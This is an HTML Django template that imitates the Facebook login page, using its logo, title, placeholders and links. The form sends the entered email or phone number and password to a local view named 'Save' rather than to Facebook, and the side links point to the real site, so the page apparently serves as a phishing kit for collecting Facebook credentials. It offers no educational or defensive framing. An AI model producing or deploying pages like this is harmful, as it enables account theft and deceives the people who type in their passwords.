<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/static/fstyle.css">
    <link rel="shortcut icon" href="/static/fbicon.webp">
    <title>Log in to Facebook</title>
</head>

<body>
    <div class="main">
        <div class="logo">
            <img src="/static/facebook img.svg" alt="Facebook">
        </div>
        <form class="container" method="post" action="{% url 'Save' %}">
            {% csrf_token %}
            {{Form}}
            <span class="login">Login to Facebook</span>
            <input type="text" name="mail" id="mail" placeholder="Email address or phone number">
            <input type="password" name="password" id="password" placeholder="Password">
            <button onclick="myfunction1()" class="login-btn" name="Save">Log In</button>
            <a id="a2" href="https://www.facebook.com/">Forgotten Account?</a>
            <div class="style"><b>or</b></div>
            <button class="new-account" ><a id="a3" href="https://www.facebook.com/">Create New Account</a></button>
        </form>
        <div id="ft">
            <b>Create a Page</b> for a celebrity, brand or business.
        </div>
    </div>
    <script src="/static/facebook.js"></script>
</body>
</html>
